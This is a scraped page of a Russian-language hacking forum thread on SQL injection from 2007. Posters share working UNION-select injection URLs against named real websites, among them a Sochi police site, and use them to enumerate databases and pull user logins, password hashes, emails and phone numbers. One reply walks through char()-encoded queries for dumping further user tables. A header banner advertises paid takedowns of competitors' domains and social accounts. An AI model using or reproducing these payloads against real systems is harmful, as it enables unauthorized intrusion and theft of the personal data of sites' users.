Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 340 из 1242

340

Опции темы

Поиск в этой теме

Опции просмотра

#3391

24.10.2007, 09:24

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Отправить сообщение для fRg с помощью ICQ

megalab.it

Код:

http://www.megalab.it/news.php?id=-1+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66/*

В title: 5.0.37-log:megalab:megalabdb@localhost
88 таблиц:

Код:

http://www.megalab.it/news.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66+from+information_schema.tables+limit+88,1/*

Данные из таблицы phpbb_users в формате "логин:пасс:мыло:icq":

Код:

http://www.megalab.it/news.php?id=-1+union+select+1,2,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66+from+phpbb_users+limit+0,1/*

#3392

24.10.2007, 10:50

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Официальный сайт УВД города-курорта Сочи:
_http://suvd.ru/rozisk.php?id=-1'
Вывода данных не нашёл, хотя количество полей определяется. На сайте несколько скулей.
Вот ещё:
_http://www.head.com/corporate/news.php?id=-1'

#3393

24.10.2007, 11:11

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Центр международных исследований в Минске

Код:

http://www.cfis.by/news.php?id=-1+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5/*&lng=ru

4.0.24_Debian-10sarge1-log:cfisby:cfisby@localhost

#3394

24.10.2007, 12:24

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

www.templatesfree.ru

Код:

http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,concat(version(),0x3a,database(),0x3a,user())/*

5.0.27-standard:eldar07_tmpfree:eldar07@localhost
30 таблиц:

Код:

http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,table_name+from+information_schema.tables+limit+30,1/*

но только таблицы с юзверями я не нашёл...

#3395

24.10.2007, 13:03

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Код:

http://fotoway.info/docs.php?id=-1'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10/*

forumphpbb@localhost:4.1.19:forumphpbb

Код:

http://fotoway.info/docs.php?id=-1'+union+select+1,2,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10+from+phpbb_users+limit+0,1/*

Код:

http://www.zlatoust.info/firms.phtml?inf=show&id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9,10,11,12,13/*

zlatoustinfo@81.177.16.31:4.1.21:zlatoustinfo

Код:

http://www.zlatoust.info/firms.phtml?inf=show&id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),8,9,10,11,12,13+from+phpbb_users+limit+0,1/*

#3396

24.10.2007, 14:16

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

www.doctor-al.ru

Код:

http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7/*&type=article

5.0.24a:doctor_al_ru:doctor_al_ru@localhost
60 таблиц:

Код:

http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables+limit+60,1/*&type=article

Таблица shop_users:

Код:

http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat(login,0x3a,name,0x3a,password,0x3a,phone,0x3a,email),5,6,7+from+shop_users+limit+0,1/*&type=article

данные в формате: "логин:имя:пасс:телефон:мыл� �".
Есть таблица users, но данные из неё достать не получается. Подскажите, буду благодарен...
В таблице users есть поля login, password, tel, tel_2, full_name, email, email_2, icq

#3397

24.10.2007, 14:30

~~a1ex~~

Banned

Регистрация: 11.10.2006

Сообщений: 682

Провел на форуме:
3750406

Репутация: 271

Отправить сообщение для a1ex с помощью ICQ

Отправить сообщение для a1ex с помощью AIM

Отправить сообщение для a1ex с помощью MSN

Отправить сообщение для a1ex с помощью Yahoo

Цитата:

http://www.captains-club.ru/index.php?id=9999999+union+select+1,2,3,4,user(),6 ,7,8,9,10/*

Не стал дальше шарить.Чистно случайно наткнулси на сайД.

#3398

24.10.2007, 14:33

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Цитата:

Сообщение от fRg

Есть таблица users, но данные из неё достать не получается. Подскажите, буду благодарен...

Код:

http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,table_schema,5,6,7+from+information_schema.tables+where+table_name=char(117,115,101,114,115)+limit+0,1/*

allergic_ru.users

Код:

http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns+where+table_name=char(117,115,101,114,115)+and+table_schema=char(97,108,108,101,114,103,105,99,95,114,117)+limit+0,1/*

id, дальше работай лимитом
аналогично для mega_magazin_ru.users

Код:

http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns+where+table_name=char(117,115,101,114,115)+and+table_schema=char(109,101,103,97,95,109,97,103,97,122,105,110,95,114,117)+limit+0,1/*

Итого:

Код:

http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat(login,0x3a,password,0x3a,email,0x3a,icq),5,6,7+from+allergic_ru.users+limit+0,1/*

Код:

http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat(login,0x3a,password,0x3a,email,0x3a,icq),5,6,7+from+mega_magazin_ru.users+limit+0,1/*

Последний раз редактировалось Nea7; 24.10.2007 в 14:36..

#3399

24.10.2007, 14:51

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

http://www.vaal.ru/show.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

#3400

24.10.2007, 14:56

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

www.uralmir.ru

Код:

http://www.uralmir.ru/articles.php?id=-1+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9/*

4.1.21-log:uralmirr_main:uralmirr_main@localhost

Страница 340 из 1242

340

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход